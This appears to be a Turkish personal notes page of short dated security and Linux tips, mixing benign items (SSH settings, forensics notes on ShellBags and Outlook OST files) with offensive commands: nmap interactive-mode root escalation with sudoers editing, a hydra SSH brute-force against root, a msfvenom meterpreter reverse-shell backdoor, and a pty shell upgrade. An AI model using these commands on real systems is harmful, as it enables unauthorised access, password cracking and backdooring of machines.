Notlarım

!!Notlar arasında anahtar kelime aramak için CTRL + F tuş kombinasyonunu kullanabilirsiniz !!


02/01/2019

SSH Bağlantısı Uzun Sürüyorsa …

SSH (Secure Shell) bağlantısının uzun bir zaman alması durumunda yani ssh login durumunda olması gerektiğinden daha uzun süre bekleniyorsa  birşeylerin yolunda gitmediği düşünebilirsiniz.
Bu durumda yapmanız gereken CONFIG dosyasına aşağıdaki satırı eklemektir.

"UseDNS no"

 


25 Aralık 2018

nmap-interactive İle Yetki Yükseltme

[normaluser@localhost]$ nmap --interactive
nmap> !sh       (sh kabuğuna geçerek komut çalıştırma.)
# whoami
root

Bu kısımda interactive uygulama elede ettikten sonra

vim /etc/sudoers

dosyasına erişip mevcut erişimimizin olduğu kullanıcıya root haklarını tanımlayabiliriz.


25 Aralık 2018

SSH Bağlantısı Kurmak İçin Kullanılan Komut

 

ssh [kullanıcı_adı]@IP_Adresi
Örneğin;
ssh user@192.168.56.102


22 Aralık 2018

SSH Portu Üzerinden Sunucuya Brute Force Saldırısı

hydra -t 40 -V -f -l root -x 3:7aA1.*-_@$&% [IP_Adresi] ssh

Komut kullanılarak Brute Force Saldırısı başlatılır.

-t 40 parametresi : 40 thread üzerinden root kullanıcısına parola deneme saldırısı yapılıyor.
-V parametresi : Deneme/Yanılma sonuçlarını ekrana yazdırıyoruz
-f parametresi : finish anlamına gelir.Parola eşleşmesi olursa saldırıyı durdurur.
-x parametresi : Saldırıda kullanılacak karakterler setini tanımlıyoruz.
(3:7) parametresi : Maksimum ve minimum parola uzunluklarını belirtiyoruz.

a —> a’dan z’ye kadar küçük harfler
A —> A’dan Z’ye kadar büyük harfler
1 —> 0 ile 9 arası sayı değerleri
.*-_@$&%  —> Doğrudan tanımlanan özel karakterler

Bu saldırıda parola bilgisini elde etme garantisi verilebilir fakat işlem süresi mantık çerçevesini aşmaktadır.
Yaklaşık olarak 380.215.245.168.359 tane deneme söz konusudur.


19 Aralık 2018

Registry ShellBags

Windows işletim sistemi dosyaların boyutunu, sembollerini, adlarını ve mevcut klasörlerinin konumlarını (dizin bilgileri) Windows Explorer’da görüntüleyebilmek amacıyla ShallBag isimli  registry dosyaları tutar.
İlgili dosyanın silinmesi durumunda bile bilgiler shallbag‘de tutulmaktadır.

HKEY_USERS / [Kullanıcı_adı] / Software / Microsoft / Windows / Shell


19 Aralık 2018

Outlook OST Dosyalarının Önemi !

Bu dosyalar Outlook Veri Dosyalarıdır.OST dosyaları çevrimdışı çalışmak ve varsayılan olarak ön belleğe alınmış olan Exchange modu kullanmak isterseniz işinize yarar.

Adli Bilişimci Gözünden : E-mail verileri , takvim içerikleri, hatırlatmalar gibi bilgileri OST dosyalarından elde edebiliriz.

 


17 Aralık 2018

Linux Üzerinden Uzak Mysql Sunucuya Bağlanma

mysql -h [Hedef IP Adresi] -u [Kullanıcı Adı] -p [Parola]

 


16 Aralık 2018

Linux Klavye Dilini Türkçe Olarak Değiştirme

setxkbmap tr


10 Aralık 2018

Mfsvenom ile Windows Platformlar için Backdoor Oluşturma

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP adresiniz] LPORT=[İletişimin kurulacağı port no] -f exe –platform windows -o /root/Desktop/backdoor.exe -e x86/shikata_ga_nai -i 20

 


3 Aralık 2018

Shell Alınan Sistemde Terminalin Spawn Edilmesi

Shell alınan bir sistemde Pseudo-terminal will not be allocated because stdin is not a terminal hatası alabiliriz.Bunun anlamı erişilen terminalin gerçek sistem terminali olmadığının fark edilmesidir.Bu hatayı atlatmak ve python pty.spawn ile gerçek bir terminal başlatmak için aşağıdaki komutu kullanabiliriz.

/use/bin/python -c ‘import pty; pty.spawn(“/bin/bash”)’